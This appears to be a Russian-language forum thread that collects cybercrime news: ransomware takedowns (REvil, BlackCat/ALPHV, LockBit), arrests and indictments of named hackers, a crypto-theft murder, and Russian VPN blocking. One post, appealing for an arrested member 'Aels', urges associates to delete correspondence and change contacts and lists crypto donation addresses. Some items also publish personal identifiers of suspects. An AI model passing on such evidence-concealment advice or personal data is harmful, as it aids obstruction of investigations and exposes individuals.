](https://www.zdnet.com/article/ransomware-suspected-revil-ransomware- affiliates-arrested/)
Suspected of about 7,000 infections, the arrested alleged affiliates asked for more than €200 million in ransom.
 www.zdnet.com
[статья](https://www.washingtonpost.com/national-security/ransomware-fbi- revil-decryption- key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html)
ФБР почти три недели воздерживалось от помощи в разблокировке компьютеров сотен предприятий и учреждений, пострадавших от крупной атаки с использованием рансома этим летом, даже несмотря на то, что бюро тайно получило цифровой ключ, необходимый для этого, по словам нескольких нынешних и бывших американских специалистов. должностные лица.
Ключ был получен через доступ к серверам российской преступной группировки, стоявшей за июльской атакой. По оценкам аналитиков, его немедленное развертывание могло бы помочь пострадавшим, в том числе школам и больницам, избежать затрат на восстановление в миллионы долларов.
Но ФБР хотело удержать ключ отчасти потому, что планировало провести операцию по уничтожению хакеров, группы, известной как REvil, и бюро не хотело их выдавать. Кроме того, правительственная оценка показала, что ущерб был не таким серьезным, как предполагалось изначально. Запланированное уничтожение так и не произошло, потому что в середине июля платформа REvil отключилась - без вмешательства правительства США - и хакеры исчезли до того, как у ФБР появилась возможность выполнить свой план, по словам нынешних и бывших официальных лиц.
В Киеве полиция расследует похищение и убийство 29-летнего иностранного
гражданина, совершенное с целью завладения его криптовалютой на сумму более
170 000 долларов или 2.5 BTC. Преступники вывезли его из дома в Соломенском
районе, заставили силой перевести биткоины на их кошелек, после чего задушили.
Тело жертвы было закопано в лесу, а украденные активы обналичены. Следствие установило, что преступление было тщательно спланировано из-за крупной суммы в биткоинах. Все четверо злоумышленников задержаны, у них изъяты деньги, автомобиль и другие вещественные доказательства.
Начато уголовное производство по фактам разбойного нападения, незаконного лишения свободы, умышленного убийства и сокрытия преступления. Подозреваемые арестованы без возможности внесения залога, им грозит пожизненное заключение.
После атаки на Colonial Pipeline ожесточилась борьба с вымогательским ПО, и форум XSS решил «откреститься» от этой темы.
Один из самых популярных русскоязычных киберпреступных форумов XSS забанил все
темы, касающиеся вымогательского ПО, для того чтобы не привлекать к себе
нежелательное внимание после атаки на Colonial Pipeline.
XSS представляет собой хакерский форум, созданный для обмена эксплоитами,
уязвимостями, вредоносным ПО и доступом к сетям. Тем не менее, по мере роста
популярности вымогательского ПО группировки, работающие по бизнес-модели
«вымогательское ПО как услуга» (Ransomware-as-a-Service, RaaS), такие как
REvil, LockBit, DarkSide, Netwalker и Nefilim, стали использовать его для
вербовки партнеров.
После того, как атака DarkSide на американского топливного гиганта Colonial Pipeline привела к дефициту бензина на всем западном побережье США, правоохранительные органы и исследователи безопасности ожесточили свою борьбу против кибервымогательских группировок и сайтов, распространяющих вымогательское ПО.
13 мая нынешнего года владелец XSS, известный как Admin, опубликовал заявление о запрете рекламы вымогательского ПО на форуме.
«Друзья, у нас на форуме запрещены локеры (Ransomware) и все, что с ними связано. А именно: партнерские программы Ransomware, аренда Ransomware, продажа локеров (Ransomware софт). Все темы, подпадающие под это правило, были удалены. К счастью, их обнаружилось всего несколько», – говорится в сообщении.
Как пояснил Admin, сам он «не любит локеры». По его словам, форум носит технический характер и предназначен для обмена знаниями, обучения и написания статей. Цель же вымогательского ПО – исключительно заработок.
«Цели не совпадают. Нет, конечно же, деньги нужны всем, но не во вред основным стремлениям. Мы ведь – не рынок и не маркет площадка», – заявил Admin.
Подробнее : https://www.securitylab.ru/news/520090.php
This is an official notice from law enforcement. Earlier this year we have
taken control of Redline and Meta infostealer infrastructure and their
customer data.
This operation is being conducted in collaboration with international law
enforcement agencies. Involved parties will be notified, and legal actions are
underway.
For details (or arrest warrants) visit
Россиянин Иван Кондратьев, являющийся, по мнению американского Минюста, взломщиком с ником Bassterlord, крайне пренебрежительно относился к собственной безопасности в интернете. Несмотря на то, что конкретные методики деанона силовиками не раскрываются, ряд приведенных ими данных указывает на достаточную беспечность хакера, на что обратил внимание энтузиаст- исследователь Soufiane.
В частности, прогнав по утечкам указанный <https://ofac.treasury.gov/recent- actions/20240220> в предписании о вводе санкций против Кондратьева почтовый адрес sinner4iter@gmail[.]com, удалось найти
__https://twitter.com/x/status/1760227383863332896
его аккаунты сразу на нескольких площадках, в том числе в сервисе заказа билетов Tutu и сервисе доставки Delivery Club. Изучив приведенные в том же документе номера телефонов предполагаемого Bassterlord, нашелся
__https://twitter.com/x/status/1760229246092325359
и его аккаунт, судя по всему, на «Госуслугах».
Редакции Darknet News удалось связаться с Иваном Кондратьевым в социальной сети «ВКонтакте». Однако тот опроверг любую причастность к незаконной деятельности и отметил, что не знает, кто такой Bassterlord.
«Я просто продал аккаунт с паспортом другому типу, а меня сейчас все е* за это. Я вообще не е, кто это и что за х** происходит. Мне все звонят, что-то просят. Какие-то америкосы, я не е, что они хотят. Я так понял, что я в лютом маргарине», — написал Кондратьев.
Он добавил, что продал акк и фото с паспортом за 50 тысяч рублей, что значительно выше средних рыночных расценок. По словам Кондратьева, сделка состоялась еще в 2020 году, когда с ним на связь в Telegram вышел неизвестный, находившийся в поиске «людей из Луганска», готовых к продаже. При этом он допустил, что напишет заявление в правоохранительные органы о том, что был «втянут в схему обмана».
«Он просто использовал мою личность, вот и все», — заключил Кондратьев, не став комментировать сброшенные ему снимки с его лицом и татуировками, которые ранее распространялись в сети как якобы принадлежащие Bassterlord.
Ранее Соединенные Штаты ввели официальные санкции против двоих россиян, которых Вашингтон подозревает в связях с группировкой LockBit, в том числе против 27-летнего Ивана Кондратьева. Американским силовикам известно, что он живет в Новомосковске, а также является одним из ключевых партнеров LockBit через организованную им структуру National Hazard Society. По данным ФБР, Кондратьев в разное время также был связан с REvil, RansomEXX и Avaddon.
ФБР предлагает инструмент расшифровки более чем 500 жертвам по всему миру, и
дополнительным жертвам рекомендуется выступить с заявлением
Министерство юстиции объявило сегодня о начале кампании против группы
вымогателей Blackcat, также известной как ALPHV или Noberus, которая атаковала
компьютерные сети более 1000 жертв и с момента своего создания нанесла ущерб
по всему миру, включая сети, поддерживающие критическую инфраструктуру США.
За последние 18 месяцев ALPHV/Blackcat стал вторым по распространенности
вариантом программы-вымогателя как услуги в мире, основываясь на сотнях
миллионов долларов выкупов, уплаченных жертвами по всему миру. Из-за
глобального масштаба этих преступлений несколько иностранных
правоохранительных органов проводят параллельные расследования.
ФБР разработало инструмент расшифровки, который позволил местным отделениям
ФБР по всей стране и партнерам правоохранительных органов по всему миру
предложить более чем 500 пострадавшим возможность восстановить свои системы.
На сегодняшний день ФБР работало с десятками жертв в США и за рубежом, чтобы
реализовать это решение, спасая многих жертв от требований выкупа на общую
сумму около 68 миллионов долларов. Как подробно описано в ордере на обыск,
опубликованном сегодня в Южном округе Флориды, ФБР также получило доступ к
компьютерной сети группы вымогателей Blackcat в рамках расследования и
конфисковало несколько веб-сайтов, которыми управляла группа.
«Разрушив деятельность группы, занимающейся вымогательством BlackCat,
Министерство юстиции в очередной раз взломало хакеров», — заявила заместитель
генерального прокурора Лиза О. Монако. «Благодаря инструменту дешифрования,
предоставленному ФБР сотням жертв программ-вымогателей по всему миру,
предприятия и школы смогли вновь открыться, а службы здравоохранения и службы
экстренной помощи смогли вернуться к работе. Мы продолжим уделять приоритетное
внимание сбоям и ставить жертв в центр нашей стратегии по разрушению
экосистемы, подпитывающей киберпреступность».
«ФБР по-прежнему неустанно привлекает киберпреступников к ответственности и
решительно настроено противостоять и сорвать кампании по вымогательству,
нацеленные на критическую инфраструктуру, частный сектор и за его пределами»,
— заявил заместитель директора ФБР Пол Аббате. «Помощь жертвам преступлений
является высшим приоритетом ФБР и отражается здесь в предоставлении
инструментов, помогающих пострадавшим в расшифровке скомпрометированных сетей
и систем. ФБР продолжит агрессивно преследовать этих преступников, где бы они
ни пытались скрыться, и обеспечит их привлечение к ответственности и
ответственность в соответствии с законом».
«В Министерстве юстиции мы уделяем приоритетное внимание безопасности и защите
жертв», — сказала исполняющая обязанности помощника генерального прокурора
Николь М. Арджентьери из уголовного отдела Министерства юстиции. «В данном
случае агенты и прокуроры неустанно работали над восстановлением сетей жертв,
но эти действия не являются кульминацией наших усилий, это только начало.
Преступные лица должны осознавать, что сегодняшнее объявление является лишь
частью этих продолжающихся усилий. В дальнейшем мы продолжим расследование и
преследуем тех, кто стоит за Blackcat, пока они не предстанут перед судом».
«Сегодняшнее объявление подчеркивает способность Министерства юстиции бороться
даже с самыми изощренными и плодовитыми киберпреступниками», — заявил прокурор
США по Южному округу Флориды Маркензи Лапойнт. «В результате неустанных усилий
нашего офиса совместно с ФБР Майами, Секретной службой США и нашими
зарубежными партнерами из правоохранительных органов мы предоставили жертвам
Blackcat в Южном округе Флориды и по всему миру возможность встать на ноги. и
укрепить свою цифровую защиту. Мы продолжим фокусироваться на привлечении
людей, стоящих за группой вымогателей Blackcat, к ответственности за свои
преступления».
Согласно открытому ордеру, участники Blackcat взломали компьютерные сети в США
и по всему миру. Сбои, вызванные вариантом программы-вымогателя, затронули
критически важную инфраструктуру США, включая государственные учреждения,
службы экстренной помощи, оборонно-промышленные базы, критически важные
производства, а также объекты здравоохранения и общественного здравоохранения,
а также другие корпорации, государственные учреждения и школы. Сумма убытков
во всем мире исчисляется сотнями миллионов и включает в себя выплаты выкупа,
уничтожение и кражу конфиденциальных данных, а также затраты, связанные с
реагированием на инциденты.
Blackcat использует модель «программы-вымогатели как услуга», в которой
разработчики несут ответственность за создание и обновление программ-
вымогателей, а также за поддержание незаконной интернет-инфраструктуры.
Филиалы несут ответственность за выявление и атаку ценных организаций-жертв с
помощью программ-вымогателей. После того, как жертва платит, разработчики и
партнеры делят выкуп.
Актеры Blackcat используют модель нападения с множественным вымогательством.
Прежде чем зашифровать систему жертвы, партнер украдет или украдет
конфиденциальные данные. Затем партнер требует выкуп в обмен на расшифровку
системы жертвы и отказ от публикации украденных данных. Злоумышленники
Blackcat пытаются получить доступ к наиболее конфиденциальным данным в системе
жертвы, чтобы усилить принуждение к выплате. Участники Blackcat полагаются на
сайт утечки, доступный в даркнете, для предания огласке своих атак. Когда
жертва отказывается платить выкуп, эти субъекты обычно принимают ответные
меры, публикуя украденные данные на веб-сайте, посвященном утечке, где они
становятся общедоступными.
Расследование ведет полевой офис ФБР в Майами.
Дело ведут судебные адвокаты Кристен Галлахер и Хорхе Гонсалес из отдела
компьютерных преступлений и интеллектуальной собственности Отдела по уголовным
делам, а также помощники прокурора США Киран Бхат и Брук Уотсон из Южного
округа Флориды.
Министерство юстиции также признает важнейшее сотрудничество немецкого
Бундескриминаламта и Центральной криминальной инспекции Геттингена, Датского
специального отдела по борьбе с преступностью и Европола. Значительную помощь
оказали Секретная служба США и прокуратура США по Восточному округу Вирджинии.
Значительную помощь также оказали Управление по международным делам
Министерства юстиции и Международная связь по кибероперациям. Кроме того,
существенную помощь и поддержку оказали следующие иностранные
правоохранительные органы: Федеральная полиция Австралии, Национальное
агентство по борьбе с преступностью и подразделение специальных операций
Восточного региона Соединенного Королевства, Национальная полиция Испании,
Кантонская полиция Тургау Швейцарии и Управление государственной защиты и
разведки Австрии.
Жертвам программы-вымогателя Blackcat настоятельно рекомендуется связаться с
местным отделением ФБР по адресу [www.fbi.gov/contact-us/field-
offices](https://translate.google.com/website?sl=auto&tl=ru&hl=ru&client=webapp&u=https://www.fbi.gov/contact-
us/field-offices) для получения дополнительной информации и определения того,
какая помощь может быть доступна.
Аффилированные лица Blackcat получили первоначальный доступ к сетям жертвы с
помощью ряда методов, включая использование скомпрометированных учетных данных
пользователя для получения первоначального доступа к системе жертвы.
Дополнительную информацию о вредоносном ПО, включая техническую информацию об
индикаторах взлома и рекомендации по смягчению его последствий, можно получить
в ФБР по адресу www.ic3.gov/Media/News/2022/220420.pdf.
.
Дополнительную информацию о продолжающемся расследовании правоохранительных
органов в отношении Blackcat можно найти на сайте
[www.justice[.]gov/media/1329536/dl?inline](https://www-justice-
gov.translate.goog/media/1329536/dl?inline&_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=wapp)
Если у вас есть информация о Blackcat, их филиалах или деятельности, вы можете
иметь право на вознаграждение в рамках программы Государственного департамента
«Вознаграждения за правосудие». Информацию можно отправить через следующую
подсказку на базе Tor (требуется браузер Tor):
he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion.
Для получения дополнительной информации о вознаграждениях за информацию о
вредоносной иностранной киберактивности против критической инфраструктуры США
посетите
https://rfj.tips/SDT55f
.
[источник на английском](https://www-justice- gov.translate.goog/opa/pr/justice-department-disrupts-prolific-alphvblackcat- ransomware-variant?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=wapp)
Приветствую форумчане!
Хотелось бы сообщить печальную новость.
Наш друг и товарищ AELS был задержан федеральным бюро расследований и немецкой
полицией.
Сейчас он находится под следствием и ему нужна ваша помощь..
Во-первых если вы работали с ним или же общались, обезопасьте себя, а именно:
1. Не отвечайте на сообщение от его имени, даже если пишут с его контактов.
2. Очистите переписку, смените контакты если вели тесную работу.
Вот немного более подробная история:
Во вторник днем (18 июля), Aels был задержан немецкой полицией и федералами у
себя дома, в Берлине.
Информацию о задержании мне лично сообщила его сожительница, по его же
просьбе.
В этот же день, я сообщил администрации форумов exploit/xss о случившейся
ситуации, предоставил доказательства и попросил заблокировать его учетные
записи, а также предупредил его учеников по спаму и людей с кем он тестно
общался, чтобы обезопасить их.
В сети он появился уже вечером, вернее был это уже не он, скорее всего тогда
произошел экспорт всех диалогов.
После задержания, я постоянно поддерживал контакт с его подругой, давал
рекомендации по поиску его в Берлине.
По началу о его судьбе ничего не было неизвестно, ни ему, ни его родственникам
(включая его местонахождение и то, что с ним произошло до четверга вечером).
В четверг(20 июля), мы связались с его временным адвокатом и получили вводную
информацию.
Пока неясно, какие последствия ему грозят и какую информацию он мог
предоставить под давлением или манипуляциями.
Однако точно известно, что при задержании у него было около 30 долларов в
кармане.
Немного подробней об этом. Я бы не сказал, что Андрей жил одним днем.
Просто все, кто с ним общался, подтвердят, что он был добросердечным
человеком. Все заработанные деньги он раздавал, помогал своим друзьям и
партнерам. Он был щедрым и скромным человеком, который никогда не отказывал в
помощи.
В пятницу(21 июля), нам удалось связаться с грамотным юристом и узнать план
действий по уменьшению срока и предотвращению ошибок.
Также была получена рекомендация к какому адвокату обратиться, выбор пал на
Аркадия Буха (используйте гугл).
Он является одним из лучших русскоговорящих специалистов в мире..
Информация (обращение) от адвоката -
https://cloud.mail.ru/public/cA91/hDKGkMT1E
Переговорив с адвокатом, мы приняли решение о его экстрадиции и суде в США,
так как это самый разумный выход из ситуации, так же адвокат сообщил, что для
ведения дела, и прочие расходы понадобится сумма порядка 150-200 тысяч
долларов (видео в приложении).
У Аелса нет таких денег.
Мы просим помощи всех неравнодушных людей, которым Андрей помогал в той или
иной мере.
Каждые 10 долларов - это уже значительная поддержка и возможность уменьшить
срок прибывания в тюрьме.
Также я добавлю, что являюсь первоисточником!
На форумах сейчас начались бурные обсуждения всей этой ситуации, люди начинают
сами выдумывать что и как произошло, но не нужно этого делать.
Периодически, по мере поступления информации, я буду здесь публиковать новости
по делу, чтобы вы были в курсе.
Реквизиты по которым вы можете помочь Андрею, так же известному как Aels, Crazy Mark, Bad Advertiser..
Bitcoin (BTC) - bc1qvmqykzadqwkn2zfwsk3suyt58uduv4z2tcjvnf
USDT (TRX) - TDZ98uBM32wyaLWX1gYa1J9Q9em5AuXsPH
MONERO (XMRT) - 0x14706C1CEd4520DECB7584E5d8A62bCb6365166f
Вознаграждение объявлено в рамках программы "Награда за справедливость".
Государственный Секретарь США Энтони Блинкен заявил, что власти США в рамках программы "Награда за справедливость" готовы выплатить до $10 млн за сведения о лицах, которые, действуя в интересах других стран, осуществляют кибератаки на важнейшую американскую инфраструктуру.
Как сообщается на официальном сайте правительства США, «предлагается до $10 млн за информацию, которая позволит идентифицировать или установить местоположение любого лица, которое, действуя по указаниям или под контролем правительства другой страны, участвует во вредоносных действиях в киберсфере против ключевой инфраструктуры США».
В своем заявлении для прессы Блинкен подчеркнул: «Соединенные Штаты не потерпят вредоносных кибердействий, направленных против основы экономики США и важнейшей инфраструктуры».
source: state.gov/sanctioning-iranians-for-malicious-cyber-acts
Арестованный в Испании Петр Левашов (Severa) считающийся одним из самых
крупных спамеров планеты, заявил в ходе суда в Мадриде об экстрадации в США ,
что он - подрядчик партии "Единая Россия", "офицер российской армии", у
которого имеются "секретная военно-учетная специальность" и подписка о
неразглашении.
Эта откровенность имеет причины. Бизнесс Severa был связан с рядом офицеров
ФСБ, чья помощь оказалось куда меньшей,, чем ожидали Левашов и его семья,
Запрос о выдаче ГРажданина Рф на родину из Росии в Испанию поступил только в
конце сентября ,после ареста. Для сравнения - В Греции по ордеру Сшу задержан
подозреваемый в отмывании 4млрд$ через Биткоины Александр Винник. Ему
аналогичный запрос Генпрукуратуры покровители обеспечили спустя 4 недели после
задержания.
Левашов отвечал за спам-атаки против сайта чеченских террористов Kavkaz-Center
и других ресурсов. Он же убеждал киберприступников помогать ФСБ.
"хакеры и спамеры ,фишеры и кардеры , большиство нас уже давно находится по ту
сторону закона,но это не мешает нам быть патриотами" -призывал Severa.
В России у арестованого оставалсь супруга Мария Левашопа, которая пытается
обьяснить друзьям мужа что долги перед ним нужно платить.
Занимавшийся накрутками просмотров каналов Телеграм и Ютуб Александр Жуков (Nastra) экстрадирован из Болгарии в бруклинскую тюрьму. Сша обвиняют его в фальсификации статистики соцсетей ,оценивая ушерб в 36млн$ Показания на петербуржца дал работавший на Фсб Росии спамер Петр Левашов (Severa). По итогам допросов Nastra агентами Фбр Сша ожидаются новые международные Аресты.
Вот поворот однако. Я помню день, когда приняли его.
26 мая 2021 на телеграмм канале Freedom Fox появилось сообщение о задержании автора канала, известного как Павел Ситников.

Information must be flow free money kill it Канал управляется искусственным интеллектом "София" Рекламу канал не поддерживает. Все материалы исключительно в образовательных целях. Ответственность за использование канал не несёт.
t.me
В данном видео сообщении его девушка (Соня Крюггер) просит помощи у комьюнити.
Известно, что Павел обвиняется по статье 273 часть 2 (Создание, использование
и распространение вредоносных компьютерных программ).
На вечер того же дня он находился дома, под домашним арестом. Ему запрещено
пользоваться средствами связи, включая телефон.
В результате масштабной операции ФБР против группировки ALPHV (BlackCat) киберпреступная группа столкнулась с серьезными проблемами. ФБР захватило доменное пространство ALPHV в темной сети, что может нанести удар по ее репутации и деятельности.
7 декабря сайты переговоров и утечки данных группы в сети Tor внезапно прекратили работу . Администраторы ALPHV списали проблему на неполадки с хостингом, однако вскоре выяснилось, что причиной стала операция правоохранительных органов. Позже Министерство юстиции США объявило об успешном проникновении ФБР в инфраструктуру вымогательской группировки ALPHV (BlackCat). Операция позволила агентам следить за действиями хакеров и получить ключи для дешифровки данных.
Инцидент произошел после громкой атаки на казино MGM Resorts International , которая привлекла большое внимание и принесла огромные убытки компании. В Barrier Networks подчеркнули, что подобного рода кибератаки неизбежно привлекают внимание правоохранительных органов.
Несмотря на то, что группировка пока продолжает свою деятельность, ей будет сложно найти новых партнеров. Власти выпустили декодер для шифровальщика ALPHV, ослабив позиции группы и демонстрируя ее уязвимость. Операция ФБР также сильно ударила по репутации ALPHV. Группировка работала, предоставляя свою программу-вымогатель аффилиатам. Однако даже намёк на присутствие правоохранительных органов среди членов группы может оттолкнуть потенциальных партнеров.
После объявления ФБР, группировка угрожала атаковать ядерные электростанции и критически важную инфраструктуру, пытаясь привлечь новых участников обещанием 90% от выкупа. Но их конкурент, группировка LockBit, быстро начала вербовать аффилиатов и участников ALPHV. LockBitSupp предложил использовать свой сайт утечек данных и панель переговоров, особенно если у аффилиатов есть копии украденных данных.
В компании Binary Defense отметили, что инцидент может привести к продаже исходного кода вредоносного ПО ALPHV и возникновению новых кампаний по распространению вымогательского ПО. Некоторые филиалы ALPHV, например, коллектив Scattered Spider, предположительно стоящий за атаками на MGM и Ceasar , способны действовать независимо от картеля-вымогателя. Также предполагается, что члены ALPHV могут перейти в другие группы в сфере вымогательского ПО.
ФБР, конфисковав инфраструктуру ALPHV в темной сети и выпустив декодер, облегчило положение многих жертв. Однако глобальная борьба с киберпреступностью продолжается, так как всегда найдутся злоумышленники, готовые занять место ALPHV.
Несмотря на операцию ФБР, пока не сообщается о каких-либо арестах, что дает группе возможность восстановить свою сеть аффилиатов и перезапуститься под новым именем. Можно предположить, что это станет следующим шагом группировки после потери репутации и недавних событий.
Стоит отметить, что группа ALPHV стала успешным ребрендингом после того, как ныне несуществующие группировки BlackMatter и DarkSide прекратили свою деятельность. С момента своего появления в августе 2020 года под названием DarkSide, группа неоднократно меняла свои имена и тактику в ответ на действия правоохранительных органов. После атаки на Colonial Pipeline в мае 2021 года группа была вынуждена прекратить свою деятельность, но вскоре возобновила её под именем BlackMatter. Однако и в этот раз группе пришлось отступить после того, как Emsisoft нашла уязвимость для создания дешифратора, и серверы группы были захвачены.
Власти США обвинили 22-летнего гражданина РФ Амина Стигала в проведении кибератак на компьютерные сети Украины и других стран для целей ГРУ.
Согласно материалам дела, в январе 2022 года Стигал распространил псевдовымогатель WhisperGate в системах десятков украинских госучреждений. Злоумышленник требовал выкуп $10 000 в биткоинах, однако вредонос фактически повреждал все разделы диска без возможности восстановления. Также россиянин перепродавал похищенные данные в даркнете.
С августа 2022 года Стигал с подельниками расширили географию атак: взломали транспортную инфраструктуру страны в Центральной Европе, атаковали правительственные учреждения США и других государств-членов НАТО.
Госдепартамент США объявил награду в $10 млн за информацию о местонахождении хакера. Ему грозит до пяти лет тюрьмы.
• Source: https://www.justice[.]gov/opa/pr/ru...ussia-military-intelligence- destroy-ukrainian
• Source: https://www.justice[.]gov/d9/2024-06/amin_stigal_unsealed_indictment_0.pdf
• Source: https://rewardsforjustice.net/rewards/amin-stigal/
В период с 2016 по 2019 год хакер продавал учетные данные систем по всему миру, украденные с помощью NLBrute.
Гражданин России, обвиняемый в разработке хакерского инструмента NLBrute, осуждён во Флориде за использования этого инструмента «для создания криминальной империи».
По данным Министерства США, Дарий Панков, также известный как «dpxaker», создал вредоносное ПО NLBrute, которое взламывало учетные данные Windows в системах с незащищённым RDP-протоколом с помощью брутфорс-атак. Панков был арестован в Грузии 4 месяца назад и недавно экстрадирован в США.
Согласно материалам дела, в период с 2016 по 2019 год Панков заработал сотни тысяч долларов, продавая NLBrute другим злоумышленникам за $250 в биткойнах и позволяя некоторым из них перепродавать этот инструмент.
Он также, как утверждается в документах , продавал в даркнете украденные учетные данные, чтобы киберпреступники могли использовать их в дальнейших атаках. В общей сложности Панков выставил на продажу учетные данные для входа в более 35 000 компьютеров со всего мира, заработав более $350 000. Среди скомпрометированных систем упоминались две неназванные американские юридические фирмы во Флориде.
Панкову предъявлены обвинения в заговоре, мошенничестве с устройствами доступа и компьютерном мошенничестве, которые, по словам прокуратуры, могут привести его в тюрьму на срок до 47 лет. Власти США также планируют арестовать $358 437, которые они связывают с преступлениями Панкова.
NLBrute делал себе имя в то время, когда брутфорс-атаки были на подъеме. В 2018 году NLBrute был одним из ключевых инструментов во взломах систем, которые использовали RDP-протокол Microsoft как способ проникновения в уязвимые системы. NLBrute также был связан с группировками REvil и Netwalker .
source: justice[.]gov/usao-mdfl/pr/russian-malware-developer-arrested-and- extradited-united-states
https://echo.msk.ru/news/2986213-echo.html
](https://www.mk.ru/economics/2022/02/26/zapad-voznamerilsya-otklyuchit- rossiyu-ot-swift-chem-eto-obernetsya.html)
Давняя задумка Запада – отключить нашу страну от системы межбанковского обмена информацией SWIFT – как никогда близка к реализации. Если до 24 февраля такой сценарий казался маловероятным, то сейчас, на фоне событий на Украине, мало что может этому помешать. По словам экспертов, отечественный...
 www.mk.ru
Дискасс.
Какая вероятность отключения?
Что мы потеряем-обретем?
Что потеряет-обретет Европа и Америка?
Таргет : instagram.com/bitmama888
Битмама, она же Валерия Федякина (28 лет), известная в мире крипты предпринимательница. Получала от клиентов наличку и обещала вывести в других странах с доплатой (хотя обычно за это берут комиссию). В сентябре Битмама пропала. Как оказалось, 15 сентября её задержали в Москве из-за подозрительной сделки: взяла у знакомого 7 миллиардов рублей и обещала вернуть с процентами. Но знакомый обратился в полицию, когда понял, что денег он не увидит. Теперь Битмаме грозит до 10 лет колонии. Она находится в СИЗО, так как у неё есть вид на жительство в ОАЭ. Кстати, она на шестом месяце беременности.
Что известно об аресте бизнесвумен Битмамы: кто такая, кого могла обмануть
В Москве арестовали предпринимательницу Валерию Федякину, более известную как Битмама. Ее подозревают в обмане своего клиента почти на 7 млрд рублей. Какие подробности известны?
Чем известна Битмама:
28-летняя Валерия Федякина прославилась благодаря успешной работе с криптообменниками, которые стали особенно популярны в условиях санкций против российских банков. Предпринимательница получала от клиентов наличные и обещала вывести деньги в другом государстве с доплатой — хотя обычно за это берут комиссию. Такой поступок Битмама объясняла своими широкими связями с представителями бизнеса и госкорпораций, которые якобы позволяют выводить деньги с выгодой.
Федякина в основном работала с богатыми клиентами. Дневной оборот бизнесвумен мог насчитывать десятки миллионов долларов. По сообщению канала, Битмана хотела организовать финансовую пирамиду, нажиться на ней и уехать. Ей приписывается воровство на $150 млн.
Почему арестовали Битмаму:
Валерию Федякину задержали еще 15 сентября после того, как знакомый обвинил ее в обмане. Пострадавший утверждал, что Битмама взяла у него 6,7 млрд рублей. Когда предпринимательница внезапно исчезла, в экспертном сообществе предположили, что ее схема — обычная финансовая пирамида. Предполагалось, что она сбежала, собрав с клиентов деньги.
Теперь выяснилось, что бизнесвумен задержала полиция после проведения подозрительной сделки. Федякина взяла у знакомого 6,7 млрд рублей, пообещав вернуть их с бонусом в 1%. Позднее мужчина заподозрил, что его обманули, и обратился в полицию.
Битмаме грозит до десяти лет лишения свободы по статье о мошенничестве. Суд уже отправил ее под арест, несмотря на беременность. Такие меры связаны с наличием у Федякиной вида на жительство в ОАЭ.
В Кировском суде Екатеринбурга приостановлен процесс по делу банды хакеров, похитивших с помощью вируса Lurk 1,7 млрд рублей. Об этом «URA.Ru» сообщила Ольга Кезик — адвокат лидера группировки Константина Козловского. Причиной стала позиция прокуратуры, внезапно вставшей на сторону подсудимых. Ведомство посчитало, что они имеют право на рассмотрение дела тройкой судей в надежде на большую объективность.
Решение об этом должно приниматься на стадии предварительного слушания по делу, но эту стадию судья Екатерина Иванченко пропустила. «Еще 26 декабря 2018 суд вынес постановление о рассмотрении дела без проведения предварительного слушания», — напомнила адвокат Кезик. Однако подсудимые продолжали требовать, чтобы дело рассматривала тройка судей: 12 февраля об этом попросил Константин Козловский, аналогичные ходатайства заявили другие подсудимые. Но, по словам защитника, все прошения были отклонены. «С широко закрытыми глазами суд нас игнорировал!» — говорит Кезик.
Степень негодования подсудимых и их защитников была столь велика, что 19 февраля сразу несколько человек потребовали отвода судьи. Прокуратура до последнего момента поддерживала позицию суда, однако сегодня, 12 марта, вручила судье свой протест на ее решение пропустить стадию предварительного слушания.
«Прокурор вдруг неожиданно узрел законность ходатайств подсудимых и просит вернуться на стадию подготовки дела к слушанию! Прорыв! Хорошая работа над ошибками, пока они не завели слишком далеко», — комментирует адвокат.
Сейчас рассмотрение дела банды Lurk по существу отложено, пока вышестоящая инстанция (Свердловский областной суд) не примет свое решение по ходатайствам хакеров и представлению прокурора. Дата заседания апелляционной инстанции пока не назначена.
скан1 : https://ura.news/images/docs/upload/376/006/1052376006/IMG_20190312_185338_473.jpg
скан2 : https://ura.news/images/docs/upload/376/006/1052376006/IMG_20190312_185343_246.jpg
В Екатеринбурге, напомним, идет суд над бандой хакеров, похищавших деньги россиян с помощью компьютерного вируса Lurk. Заседания шли в закрытом режиме.
Клиенты российских провайдеров не могут подключиться к серверам за пределами РФ или даже внутри страны.
«Роскомсвобода» (признана иноагентом в РФ) сообщает в своем Telegram-
канале , что
OpenVPN-подключения стали
блокироваться российскими интернет-провайдерами. Об этом сообщают
VPN-провайдеры и пользователи
сети.
По данным «РКС» и форума NTC.party , блокировка затрагивает разные регионы России и разных операторов. Среди них упоминаются Билайн (мобильный интернет в Казани, проводной интернет в Москве), Таттелеком, Дом.ру (Тула), МТС (Челябинск), Мегафон (Краснодар), Ростелеком (Краснодар) и другие.
Видимо, наличие или отсутствие блокировки зависит от того, есть ли на сети провайдера оборудование ТСПУ (DPI), а также возможно, что новые правила фильтрации пока что введены только на некоторых сетях или только для определенных групп абонентов в качестве тестирования. Первые сообщения о блокировке OpenVPN поступили около 20:00 (МСК) во вторник 30 мая.
Блокировка происходит путем разрыва OpenVPN-сессии спустя несколько пакетов. Соединение устанавливается полностью, но через секунду-две обрывается или прекращается передача трафика. По словам некоторых пользователей, блокировка действует только при подключении к серверам за границей РФ, по словам других пользователей, фильтрации подвергаются даже подключения к серверам внутри страны.
Подробнее: https://www.securitylab.ru/news/538577.php
На блоге дефейс:
Пока без деталей, т.к. "a number of actions are still ongoing”, участники операции: США, Германия, Франция, Италия, Япония, Испания, Голландия, Чехия, и Латвия.
Украина и Польша не упоминаются, пока непонятно правда - радоваться этому или нет. Увижу что-то новое - добавлю.
Будьте бдительны и осторожны, наверняка опять все было целиком слито и кто-то арестован из админов-кодеров с бэкапами.
Всё больше жертв отказывается платить деньги за разблокировку данных.
2022 год был важным годом в борьбе с программами-вымогателями. По статистике компании Chainalysis, кибербандиты по всему миру смогли суммарно заполучить около 457 млн долларов в 2022 году. Когда как в 2020 и 2021 эти цифры стремились к 800 миллионам. На лицо падение практически на 40%.
Понятно, что невозможно зафиксировать абсолютно все киберпреступления, происходящие в мире, но даже по информации в открытом доступе прослеживается чёткая тенденция — доходы хакеров резко сократились в 2022 году. С чем же это связано?
Снижение заработка злоумышленников с помощью программ-вымогателей вовсе не говорит, что количество атак сократилось. Специалисты из Chainalysis считают, что большинство организаций-жертв банально отказывается платить вымогателям. И это происходит всё чаще.
